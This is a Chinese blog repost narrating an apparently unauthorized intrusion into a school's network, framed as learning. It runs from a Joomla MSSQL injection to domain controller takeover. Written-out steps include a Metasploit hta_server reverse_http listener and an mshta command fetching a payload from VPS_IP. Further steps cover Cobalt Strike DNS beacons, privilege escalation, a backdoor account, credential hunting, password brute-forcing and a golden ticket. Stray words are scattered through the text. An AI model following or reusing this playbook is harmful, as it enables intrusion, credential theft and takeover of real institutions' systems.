原文:https://bbs.ichunqiu.com/thread-58227-1-1.html
php
一 、 前言html
近期一直再學習內網滲透,實驗什麼的都是玩玩靶機。web
這一天朋友說有個站點有漏洞,就發過來看了一些是一個SQL注入,繼而開啓了此次內網滲透。水平有限,而且初學哈哈哈哈!沒有什麼技術要點純屬誤打誤撞,若是有什麼錯誤的地方但願大佬多多指點!
sql
二 、 WEB點進入內網shell
此次滲透是從站庫分離的狀況下在深刻進去內網在拿下域控服務器,也都是普通的滲透思路,並無什麼技術含量!數據庫
首先WEB點是一個MSSQL注入漏洞,而且這個注入是sa權限的!windows
首先這個站點是使用JoomlaCMS搭建的,可是在一處Study信息登記處發現了SQL注入漏洞
接着抓下此處查詢的數據包進行注入,而且或者了是高權限,能夠開啓xp_cmdshell來進行進一步的提權。服務器
在注入的返回的指紋信息能夠獲知對方的操做系統大機率就是windows Server 2012系統
那麼接下來不用想就是直接提權到MSF上面了,這裏使用hta來提權到MSF微信
msf5 > use exploit/windows/misc/hta_servermsf5 exploit(windows/misc/hta_server) > set payload windows/meterpreter/reverse_httppayload => windows/meterpreter/reverse_httpmsf5 exploit(windows/misc/hta_server) > set lhost VPS_IPlhost => VPS_IPsession
這裏就開始監聽斷開,而後須要在對方哪裏執行命令。
以下
接着在執行 mshta.exe http://VPS_IP:8080/IAKWSlu.hta
執行以後對方直接上線MSF了,這裏能夠看到對方的主機名稱就叫DATABASE.
看似一切順利,可是每每都不會如本身想的那樣,上線以後一直不能執行命令,都返回超時。在VPS的流量過去應該也不會有多大的阻礙啊!
也許是被對方的一些設備攔截了吧!
既然MSF不能操做的話,SQLMAP提供的shell也不是很好操做,那麼能夠試着寫入webshell進入到對方主機上面。
可是我查找了一番並沒有WEB路徑,這裏時候想起了它的主機名稱,會不會是一個站庫分離的網站。
對於MSSQL注入查詢是否站庫分離很簡單
select @@servernameselect host_name()
果不其然這裏的確就是站庫分離。
既然是MSF的流量比較明顯,也不能寫入webshell,那麼我如今就但願能讓其上線CobaltStrike吧!
通過一番測試發現HTTP流量也是返回不了Beacon那麼我就使用DNS隧道來上線。
首先須要配置域名解析到CS的服務器上面,而且執行NS記錄。這裏就略過過程了。
首先生成DNS隧道監聽。主機這裏填寫A記錄
接着會彈出來要給框,這裏須要填寫的就是填寫域名解析的NS記錄了!
接着使用powershell來讓其上線,可是發如今SQLMAP的shell中這裏顯示沒法使用powershell。
這裏多是用戶的緣由吧!這裏的用戶是mssql用戶。
若是不能使用Powershell上線,那麼可使用CS的hta文件上線。
利用CS生成hta文件而後掛到CS服務器上面,接着在shell中順利執行,而且CS上線小黑框!看來上線有望了!
使用tcpdump監聽53端口的流量,能夠看到這裏目標已經開始鏈接CS服務器了!
上線以後,使用ipconfig /all查看當前IP。
發現DNS這裏存在域名,這裏初步推測是存在域環境的。
而且當前的主機在10段的網段中。在往下看能夠看到DNS服務器由兩個IP地址。
這裏初步推斷這就是域控了!
由於通常安裝域控的話都會安裝DNS服務器,而且解析到域控上面!
接着使用systeminfo來查看主機的信息。能夠看到系統是windows2012的系統,而且能夠肯定的是由域環境。
而且可是打的補丁不少,當前的權限是mssql權限,必須提權才能進行下一步滲透!
試ping一下DNS的主機名稱。
是能夠ping的通的徹底沒有問題,若是不一樣的話也不該該哈哈哈!!
能夠看到DNS的IP地址爲10.10.10.2。
若是這個域不大的話那麼應該可能這個就是域控了!可是奇怪的就是有的時候也會出現10.10.10.4!
還有就是!當我訪問www的域名的時候,它會給我轉跳到web的域名上面去。
因此我懷疑10.10.10.1這臺主機並非真正的提供WEB的服務器!
也就是否是JoomlaCMS這個WEB的服務器
接着對內網的機器進行探測,這裏可使用K8gege的龍珠插件,對這個網段進行探測。最後在進行判斷。
這個域是由三個DNS服務器的!
而且從探測信息返回的主機名稱看,這三個DNS服務器就是域控了!
而且WEB服務器就是10.10.10.1這臺服務器,由於在先前判斷站庫分離的時候已經知道WEB服務器的名稱了!
接下來就開始提權了!這裏能夠利用systeminfo輸入的補丁信息複製到提權輔助頁面上面進行補丁比對
https://bugs.hacking8.com/tiquan/
也可也利用MSF上面的post模塊上的本地提權插件來進行獲取提權漏洞信息。
這裏我把會話傳遞到MSF上,而且使用本地提權查詢模塊
msf5 exploit(windows/misc/hta_server) > use post/multi/recon/local_exploit_suggestermsf5 post(multi/recon/local_exploit_suggester) > set session 1msf5 post(multi/recon/local_exploit_suggester) > run
這裏MSF返回信息說能夠利用ms16-075。話很少說直接提權開搞!
利用CS的本地提權插件裏面的potato提權漏洞進行提取成功。
提取到了system權限原本是能夠獲取對方的哈希的,由於是windows 2012的操做系統這裏沒法獲取明文。
可是這臺機器開啓了LSA保護吧!連mimikatz都不能執行了,返回5結尾的報錯!
因此我直接建立一個用戶用於等下鏈接3389
接下來能夠利用代理進入對方的內網,我測試了一下CS自帶的socks代理並非很好,有的時候會卡住。
這裏我選擇上傳iox來進行代理
進入內網以後直接開搞!首先能夠對內網的永恆之藍的機器進行掃描。
成功掃描除了10.10.10.41和10.10.10.37這兩臺機器是存在永恆之藍漏洞的!
這裏我直接打10.10.10.41,它的操做系統是windows 7 。10.10.10.37是windows 2003的系統先不搞!
MSF給我連續打了好幾波!可是都沒有成功!這裏應該是失敗了!
對端設備有防火牆或者殺軟的軟件攔截了吧。
3、 失去權限!從新再次進入內網
這個時候已是晚上四點鐘了,肝不下去了直接睡覺!誰知道次日一塊兒來CS的Beacon已經掉線,而且還上線不了了!!!!
可能管理員已經發現而且加固了服務器了!
若是對方沒有把個人VPS禁止的話那還行能夠繼續進行滲透的!
首先再VPS上面進行icmp流量!
而後在目標Ping服務器,發現流量是能夠通的
上次上傳的iox已經被管理員給刪除了,接下來的話須要在下載過去。
接着測試HTTP流量也是徹底能夠的。兩端能夠通信HTTP流量。
那麼就能夠經過VPS開啓HTTP服務下載軟件到對方的服務器上面
這裏我不選擇iox來進行代理了,應爲我如今已經失去了一個CS的穩定控制,這裏我選擇VENOM這個代理工具,這個代理工具在代理成功以後可使用shell命令獲取一個CMD的shell。
這裏就能夠免去SQLMAP那個shell了!!
接着代理進去以後原本想用以前建立的帳號進行登錄的,可是當時沒有建立隱藏用戶,登錄不上去了。
這個時候我對這臺數據庫進行信息收集,既然是數據庫服務器,那麼敏感的信息必定有。可使用以下命令進行
dir /s /b *.txtdir /s /b *.batdir /s /b *.xml
這裏我在C盤的目錄下驚喜的發現,這有敏感的批處理文件,名字大概的意思就是備份數據庫。
這裏我查看裏面的信息。
發現裏面是對其餘服務器進行鏈接的批處理,而且還有帳號名和密碼。
真的是太幸運了!這個時候想起一句話:滲透成功的概率是和對方管理員的水平成正比的!!!!
這個時候我頓時興奮了起來!既然管理員經過這樣來進行備份,那麼他不少管理機器應該都是相同的密碼。
接着我整理一下用戶名和密碼字典。
在代理的狀況下對其內網的機器開始爆破破解。爆破出來以後發現域控服務器都在裏面!!
管理員爲了方便管理運維服務器!不少服務器的密碼都同樣,這裏我直接登錄進去10.10.10.5這臺數據庫服務器看看爲啥不能上線了!
進去以後才發現是這個eset。怪不得我上線不了,原來是這個東西在做怪!
10.10.10.5這臺機器就是數據庫,裏面由存放除了網站的數據信息以外,還有一些學校裏面的一些文檔信息。
這臺服務器其實就是上次的文檔文件之類的都是上傳到這裏
接着登錄到10.10.10.1這臺服務器看看!由於這臺服務器是解析www的,而且查詢學生信息的域名也是www的,那麼確定10.10.10.1是鏈接MSSQL的。
而且進入到WEB目錄下次。
的確這裏會轉跳到web域名哪裏
接着在這臺服務器裏面發現了MSSQL數據庫的鏈接文件,而且發現了密碼
接着使用龍珠的插件進行web掃描,發現了他的JoomlaCMS的IP地址就是10.10.10.45和10.10.10.202
而後訪問之,發現它的網站是使用xampp搭建的網站,而後再它的配置文件找到了它的數據庫鏈接文件。
這裏他也是有phpmyadmin的,若是是內網訪問的話是無密碼就能夠訪問,外網是不能訪問的!
接着查看這臺機器的arp表項,發現這臺機器有對10.10.11.0/24網段的主機進行通訊,好傢伙!
馬上對這個網段進行探測,而後登錄進來了一臺10.10.11.6這臺主機。是一臺檔案機器。
可是10.10.11.0/24這個網段不多機器!有幾臺tp-link。
還有的大多數都是虛擬機。接着登錄到域控制器上面,這裏域控分爲三個域控!最後查看了一下發現這個域存在的主機挺多的!
這裏能夠直接管理這些主機了
最後把域控的hash dump下來製做了黃金票據,可是都不能pth了!
看了一下報錯大部分顯示有防火牆攔截之類的!
可是奇怪的是我再內網翻了一下發現了一處有意思的東西,就是某大佬以前入侵沒有抹乾淨的文本文件。
這裏是mimikatz的內網,時間是距離如今的2個月前的3月份哈哈哈哈哈!可能管理員再大佬滲透以後作了加固吧!
學習更多黑客技能!體驗靶場實戰練習
(黑客視頻資料及工具)
往期內容回顧
本文分享自微信公衆號 - 暗網黑客(HackRead)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。